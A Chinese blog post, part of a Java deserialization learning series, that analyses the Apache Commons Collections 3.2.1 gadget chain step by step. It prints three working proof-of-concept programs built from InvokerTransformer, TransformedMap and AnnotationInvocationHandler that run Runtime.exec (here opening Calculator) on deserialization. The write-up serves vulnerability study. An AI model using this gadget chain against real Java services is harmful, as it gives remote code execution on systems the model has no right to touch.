<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.8.0">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="description" content="whip1ash&#39;s blog">
  <meta name="keyword" content="hexo-theme, vuejs">
  <meta name="google-site-verification" content="Jn3GoSbAsK1naf6utvvBn1NniTRbPspDlWKN6rjfHNI">
  <meta name="google-site-verification" content="U05PlKKB3jyiKQ6gkPfsh9R5SUeWyo4Lml44hId45VI">
  
    <link rel="shortcut icon" href="/css/images/logo.png">
  
  <title>
    
      Apache Commons Collections反序列化漏洞分析(上) - 从0开始学习Java反序列化 (3) | whip1ash
    
  </title>
  <link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link href="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.css" rel="stylesheet">
  <link href="//cdn.bootcss.com/highlight.js/9.12.0/styles/tomorrow.min.css" rel="stylesheet">
  <link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/css/plugins/gitment.css">
  <script src="//cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
  <script src="//cdn.bootcss.com/geopattern/1.2.3/js/geopattern.min.js"></script>
  <script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>
  <script src="/js/qrious.js"></script>
<script src="/js/gitment.js"></script>
</head>
<div class="wechat-share">
  <img src="/css/images/logo.png">
</div>

  <body>
    <header class="header fixed-header">
  <div class="header-container">
    <a class="home-link" href="/">
      <div class="logo"></div>
      <span>whip1ash</span>
    </a>
    <ul class="right-list">
      
        <li class="list-item">
          
            <a href="/" class="item-link">Home</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/tags/" class="item-link">Tags</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/archives/" class="item-link">Archives</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/project/" class="item-link">Projects</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/about/" class="item-link">About</a>
          
        </li>
      
    </ul>
    <div class="menu">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </div>
    <div class="menu-mask">
      <ul class="menu-list">
        
          <li class="menu-item">
            
              <a href="/" class="menu-link">Home</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/tags/" class="menu-link">Tags</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/archives/" class="menu-link">Archives</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/project/" class="menu-link">Projects</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/about/" class="menu-link">About</a>
            
          </li>
        
      </ul>
    </div>
  </div>
</header>

    <div id="article-banner">
  <h2>Apache Commons Collections反序列化漏洞分析(上) - 从0开始学习Java反序列化 (3)</h2>
  <p class="post-date">2018-11-11</p>
  <div class="arrow-down">
    <a href="javascript:;"></a>
  </div>
</div>
<main class="app-body flex-box">
  <!-- Article START -->
  <article class="post-article">
    <section class="markdown-content"><h1 id="0x01-一支穿云箭，千军万马来相见"><a href="#0x01-一支穿云箭，千军万马来相见" class="headerlink" title="0x01 一支穿云箭，千军万马来相见"></a>0x01 一支穿云箭，千军万马来相见</h1><blockquote>
<p>天地合我，我合天地，神人赴我，我赴神人，精氣合全，神氣合群，杳杳冥冥，天地濟主，聞呼即至，聞召即臨，焚香召請，功曹使者，遞奏神員，聞今召請，速赴壇前。仰頭傳香，拜請九天玄女，歷代流旅尊師，合諸仙眾，下赴壇前，有事相請，速去速來，明彰報應。<br>– 诸天神咒</p>
</blockquote>
<p>此篇文章由浅入深，不能算是教程了，只能算是个人学习的一个log，但是还是希望把这篇东西分享出来。</p>
<h1 id="0x02-一切先从POC开始"><a href="#0x02-一切先从POC开始" class="headerlink" title="0x02 一切先从POC开始"></a>0x02 一切先从POC开始</h1><p>首先配置一下环境，特别简单，只需要给项目添加Maven就行了。<br><img src="/media/15419464684322.jpg" alt="-w598"></p>
<p>在这里面选择Maven就行了。我这里用的3.2.1版本的commons-collections，pom.xml如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;project xmlns=&quot;http://maven.apache.org/POM/4.0.0&quot;</span><br><span class="line">         xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span><br><span class="line">         xsi:schemaLocation=&quot;http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd&quot;&gt;</span><br><span class="line">    &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;</span><br><span class="line"></span><br><span class="line">    &lt;groupId&gt;Apache_commoms&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;Apache_Commons_Collections1&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;1.0-SNAPSHOT&lt;/version&gt;</span><br><span class="line"></span><br><span class="line">    &lt;dependencies&gt;</span><br><span class="line">        &lt;dependency&gt;</span><br><span class="line">            &lt;groupId&gt;commons-collections&lt;/groupId&gt;</span><br><span class="line">            &lt;artifactId&gt;commons-collections&lt;/artifactId&gt;</span><br><span class="line">            &lt;version&gt;3.2.1&lt;/version&gt;</span><br><span class="line">        &lt;/dependency&gt;</span><br><span class="line">    &lt;/dependencies&gt;</span><br><span class="line">&lt;/project&gt;</span><br></pre></td></tr></table></figure>
<p>先来看一个简单的POC.</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">commom_collection</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] argv)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Transformer[] transformers_exec = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">                <span class="comment">// 0x01</span></span><br><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line">                <span class="comment">// 0x02</span></span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>,<span class="keyword">new</span> Class[]&#123;String.class,Class[].class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>,<span class="keyword">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>,<span class="keyword">new</span> Class[]&#123;Object.class, Object[].class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="keyword">null</span>,<span class="keyword">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,<span class="keyword">new</span> Class[]&#123;String.class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="comment">//0x03</span></span><br><span class="line">        Transformer chain = <span class="keyword">new</span> ChainedTransformer(transformers_exec);</span><br><span class="line">        chain.transform(chain);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里有看起来非常眼熟的几个关键字，getMethod，invoke，exec。好像是在使用反射做一些事情，一点一点跟进去看看。</p>
<h2 id="0x01-org-apache-commons-collections-functors-ConstantTransformer"><a href="#0x01-org-apache-commons-collections-functors-ConstantTransformer" class="headerlink" title="0x01 org.apache.commons.collections.functors.ConstantTransformer"></a>0x01 org.apache.commons.collections.functors.ConstantTransformer</h2><p>看一下这个类的构造方法，还有transform方法(后面用的到)。</p>
<p><img src="/media/15419506529270.jpg" alt="-w1059"></p>
<p>构造方法将传进来的对象赋值给<code>iConstant</code>属性，<code>transform</code>返回了构造方法保存的对象。</p>
<h2 id="0x02-org-apache-commons-collections-functors-InvokerTransformer"><a href="#0x02-org-apache-commons-collections-functors-InvokerTransformer" class="headerlink" title="0x02 org.apache.commons.collections.functors.InvokerTransformer"></a>0x02 org.apache.commons.collections.functors.InvokerTransformer</h2><p><img src="/media/15419509697759.jpg" alt="-w1568"></p>
<p>这个看起来简直太熟悉了，构造方法把传进来的方法名，参数类型和参数赋给<code>InvokerTransforme</code>的几个属性，<code>transform</code>中分别通过反射进行调用。反射这一点可以看我上一篇的代码注释。</p>
<h2 id="0x03-org-apache-commons-collections-functors-ChainedTransformer"><a href="#0x03-org-apache-commons-collections-functors-ChainedTransformer" class="headerlink" title="0x03 org.apache.commons.collections.functors.ChainedTransformer"></a>0x03 org.apache.commons.collections.functors.ChainedTransformer</h2><p><img src="/media/15419516691890.jpg" alt="-w994"></p>
<p>这几个方法都比较简单，在这里，构造方法将数组赋给<code>iTransformers</code>属性，然后<code>transform</code>方法遍历数组中的每一个对象的transform方法，将数组中上一个transform方法返回的对象再当做参数传入到下一个对象的transform方法中。这里有点绕，debug一下就能很简单的看出来。</p>
<h2 id="0x04-为什么这样就能成功执行呢"><a href="#0x04-为什么这样就能成功执行呢" class="headerlink" title="0x04 为什么这样就能成功执行呢"></a>0x04 为什么这样就能成功执行呢</h2><p>在<a href="http://whip1ash.cn/2018/11/06/java-deserialization-1/" target="_blank" rel="noopener">上一篇</a>我已经比较详细的写过一些反射的Demo，在Runtime的那个Demo里，用了一个比较简单的方法来调用Runtime这个单例模式下的类。但在这里存在一些限制，把<code>ConstantTransformer</code>和<code>InvokerTransformer</code>的逻辑整合一下，如下面的代码所示。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">import java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line">public class limit &#123;</span><br><span class="line">    public static void main(String[] args) throws Exception&#123;</span><br><span class="line"></span><br><span class="line">        Object constantToReturn = &quot;A User Input Object&quot;;</span><br><span class="line">        //名称</span><br><span class="line">        String iMethodName = &quot;A Method Name&quot;;</span><br><span class="line">        //参数类型</span><br><span class="line">        Class[] iParamTypes = new Class[]&#123;&#125;;</span><br><span class="line">        //参数</span><br><span class="line">        Object[] iArgs = new Object[]&#123;&#125;;</span><br><span class="line"></span><br><span class="line">        Class cls = constantToReturn.getClass();</span><br><span class="line">        Method method = cls.getMethod(iMethodName,iParamTypes);</span><br><span class="line">        object = method.invoke(constantToReturn,iArgs);</span><br><span class="line">        </span><br><span class="line">        .......进入循环</span><br><span class="line">            </span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>实现一下这个需求，代码如下所示，</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">reflact_runtime</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] argv)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Object object = Runtime.class;</span><br><span class="line">        Class cls = object.getClass();</span><br><span class="line">    </span><br><span class="line">        Method method = cls.getMethod(<span class="string">"getMethod"</span>, String.class, Class[].class);</span><br><span class="line">        object = method.invoke(object,<span class="string">"getRuntime"</span>,<span class="keyword">new</span> Class[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line">        cls = object.getClass();</span><br><span class="line">        method = cls.getMethod(<span class="string">"invoke"</span>,Object.class, Object[].class);</span><br><span class="line">        object = method.invoke(object,<span class="keyword">null</span>,<span class="keyword">new</span> Object[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line">        cls = object.getClass();</span><br><span class="line">        method = cls.getMethod(<span class="string">"exec"</span>,String.class);</span><br><span class="line">        object = method.invoke(object,<span class="string">"open /Applications/Calculator.app"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>代码原理如时序图所示（第一次画时序图，感觉画的不是很好）</p>
<p><img src="/media/15420136745767.jpg" alt=""></p>
<p>更：上面的写法确实有些麻烦了，这里可以直接获取getRuntime方法，代码如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Object obj = Runtime.getRuntime();</span><br><span class="line">Class cls = obj.getClass();</span><br><span class="line">Method method = cls.getMethod(<span class="string">"exec"</span>,String.class);</span><br><span class="line">method.invoke(obj,<span class="string">"open /Applications/Calculator.app"</span>);</span><br></pre></td></tr></table></figure>
<p>所以上面的POC可以变成如下形式</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">commom_collection</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] argv)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Transformer[] transformers_exec = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">                <span class="keyword">new</span> ConstantTransformer(java.lang.Runtime.getRuntime()),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,<span class="keyword">new</span> Class[]&#123;String.class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line"></span><br><span class="line">        Transformer chain = <span class="keyword">new</span> ChainedTransformer(transformers_exec);</span><br><span class="line">        chain.transform(chain);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="0x03-第二个POC"><a href="#0x03-第二个POC" class="headerlink" title="0x03 第二个POC"></a>0x03 第二个POC</h1><p>刚才的POC有点简单，可能没有人会在最后直接调用<code>ChainedTransformer.transform</code>，看一下第二个POC。</p>
<h2 id="0x01-小二，上POC"><a href="#0x01-小二，上POC" class="headerlink" title="0x01 小二，上POC!"></a>0x01 小二，上POC!</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.*;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Iterator;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"><span class="keyword">import</span> java.util.Set;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">cc_poc2</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Transformer[] transformers_exec = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>,<span class="keyword">new</span> Class[]&#123;String.class,Class[].class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>,<span class="keyword">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>,<span class="keyword">new</span> Class[]&#123;Object.class, Object[].class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="keyword">null</span>,<span class="keyword">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,<span class="keyword">new</span> Class[]&#123;String.class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line"></span><br><span class="line">        Transformer chain = <span class="keyword">new</span> ChainedTransformer(transformers_exec);</span><br><span class="line"></span><br><span class="line">        Map innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line">        innerMap.put(<span class="keyword">null</span>,<span class="keyword">null</span>);</span><br><span class="line"></span><br><span class="line">        Map outerMap = TransformedMap.decorate(innerMap,<span class="keyword">null</span>,chain);</span><br><span class="line"></span><br><span class="line">        Set set = outerMap.entrySet();</span><br><span class="line"></span><br><span class="line">        Iterator localIterator = set.iterator();</span><br><span class="line"></span><br><span class="line">        Map.Entry localEntry = (Map.Entry) localIterator.next();</span><br><span class="line"></span><br><span class="line">        localEntry.setValue(<span class="keyword">null</span>);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="0x02-一些基础资料"><a href="#0x02-一些基础资料" class="headerlink" title="0x02 一些基础资料"></a>0x02 一些基础资料</h2><p>这里列一下上面代码相关的一些知识点，供Java基础不太好的同学自行选择</p>
<ul>
<li>Java泛型<ul>
<li><a href="https://blog.csdn.net/s10461/article/details/53941091" target="_blank" rel="noopener">java 泛型详解</a>  建议通读，对泛型有个大概的了解即可，无需深究底层实现</li>
<li><a href="https://segmentfault.com/a/1190000005179147" target="_blank" rel="noopener">泛型数组</a></li>
<li><a href="https://segmentfault.com/a/1190000002646193" target="_blank" rel="noopener">Java泛型：泛型类、泛型接口和泛型方法</a></li>
</ul>
</li>
<li>Map / HashMap<ul>
<li><a href="https://www.cnblogs.com/skywang12345/p/3310835.html" target="_blank" rel="noopener">HashMap详细介绍(源码解析)和使用示例</a> 主要注重用法</li>
<li><a href="https://www.cnblogs.com/Berryxiong/p/6144086.html" target="_blank" rel="noopener">遍历HashMap的四种方法</a> 注意迭代器的用法</li>
<li><a href="https://blog.csdn.net/weixin_42956945/article/details/81637843" target="_blank" rel="noopener">Java中Map的entrySet()详解</a> 小Demo</li>
<li><a href="https://blog.csdn.net/chindroid/article/details/8076705" target="_blank" rel="noopener">HashMap<k, v="">泛型类</k,></a></li>
</ul>
</li>
<li>类型转换<ul>
<li><a href="https://blog.csdn.net/weixin_37770552/article/details/77528570" target="_blank" rel="noopener">java向上类型转换和向下类型转化与强制类型转换</a></li>
</ul>
</li>
</ul>
<h2 id="0x03-分析时的注意事项以及时序图"><a href="#0x03-分析时的注意事项以及时序图" class="headerlink" title="0x03 分析时的注意事项以及时序图"></a>0x03 分析时的注意事项以及时序图</h2><p>花了大概一两个小时的时间画了个时序图，下面的时序图是从poc的<code>Map innerMap = new HashMap();</code>开始的。<code>Hashmap</code>以上的分析在第一个poc中已经详细涉及到了。</p>
<p>分析代码的时候主要注意内部类属性中值的传递，比如，好几个内部类中都有parent属性，以及最初的valueTransformer属性。</p>
<p><img src="/media/15421147708792.jpg" alt="-w1296"></p>
<h2 id="0x04-伏笔"><a href="#0x04-伏笔" class="headerlink" title="0x04 伏笔"></a>0x04 伏笔</h2><p>在分析完POC2后，可以仔细的看看其中的<code>AbstractInputCheckedMapDecorator$MapEntry</code>这个类，如果上面的代码都分析清楚的话，分析这个类并不是很复杂，只需要重点看一下<code>MapEntry</code>父类<code>AbstractMapEntryDecorator</code>的<code>getKey()</code>和<code>getValue()</code>方法即可。会发现这两个方法获得的其实是上面Hashmap(变量innerMap)添加的键值对。</p>
<h1 id="0x04-第三个POC"><a href="#0x04-第三个POC" class="headerlink" title="0x04 第三个POC"></a>0x04 第三个POC</h1><p>当看到第二个POC的时候有的同学可能会想，真实情况可能也没有人这么写，因为太蠢了。是的，第二个POC就是把真是情况的代码中的调用过程给拆开了，快要触及到问题的本质了。</p>
<h2 id="0x01-喝完这一杯，还有一杯"><a href="#0x01-喝完这一杯，还有一杯" class="headerlink" title="0x01 喝完这一杯，还有一杯"></a>0x01 喝完这一杯，还有一杯</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.*;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">cc_poc3</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        Transformer[] transformers_exec = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">                <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>,<span class="keyword">new</span> Class[]&#123;String.class,Class[].class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="string">"getRuntime"</span>,<span class="keyword">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>,<span class="keyword">new</span> Class[]&#123;Object.class, Object[].class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="keyword">null</span>,<span class="keyword">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>,<span class="keyword">new</span> Class[]&#123;String.class&#125;,<span class="keyword">new</span> Object[]&#123;<span class="string">"open /Applications/Calculator.app"</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line"></span><br><span class="line">        Transformer chain = <span class="keyword">new</span> ChainedTransformer(transformers_exec);</span><br><span class="line"></span><br><span class="line">        HashMap innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line">        innerMap.put(<span class="string">"value"</span>,<span class="string">"asdf"</span>);</span><br><span class="line"></span><br><span class="line">        Map outerMap = TransformedMap.decorate(innerMap,<span class="keyword">null</span>,chain);</span><br><span class="line"></span><br><span class="line">        Class clazz = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line">        Constructor cons = clazz.getDeclaredConstructor(Class.class,Map.class);</span><br><span class="line">        cons.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"></span><br><span class="line">        Object ins = cons.newInstance(java.lang.annotation.Retention.class,outerMap);</span><br><span class="line"></span><br><span class="line">        ByteArrayOutputStream baos = <span class="keyword">new</span> ByteArrayOutputStream();</span><br><span class="line">        ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(baos);</span><br><span class="line">        oos.writeObject(ins);</span><br><span class="line">        oos.flush();</span><br><span class="line">        oos.close();</span><br><span class="line"></span><br><span class="line">        ByteArrayInputStream bais = <span class="keyword">new</span> ByteArrayInputStream(baos.toByteArray());</span><br><span class="line">        ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(bais);</span><br><span class="line">        Object obj = (Object) ois.readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个POC细心的同学会发现在一个细微的地方有所不同。这里的Hashmap添加了一个<code>key</code>为<code>&quot;value&quot;</code>，<code>value</code>为<code>&quot;asdf&quot;</code>的键值对，而不是像第二个poc里，直接添加一个空的键值对。这个地方在后面会说到，这里key的值必须是字符串<code>&quot;value&quot;</code>，而<code>value</code>的值，只要不为<code>java.lang.annotation.RetentionPolicy</code>或<code>sun.reflect.annotation.ExceptionProxy</code>类的对象就可以。</p>
<h2 id="0x02-sun-reflect-annotation-AnnotationInvocationHandler"><a href="#0x02-sun-reflect-annotation-AnnotationInvocationHandler" class="headerlink" title="0x02 sun.reflect.annotation.AnnotationInvocationHandler"></a>0x02 sun.reflect.annotation.AnnotationInvocationHandler</h2><blockquote>
<p>java有一个特征，不管经过几层封装，封装成什么类型，最终在readObject的时候，都会按照被封装的倒序去执行readObject。(ps:这是一段极其抽象的话，为了解释这段抽象的话，我画了一个看起来很抽象的画，在下师从抽象派大师梵高)<br><img src="/media/15424379183450.jpg" alt=""><br>即使最后是读者们执行readObject，最后也会一层一层到上帝来执行readObject</p>
</blockquote>
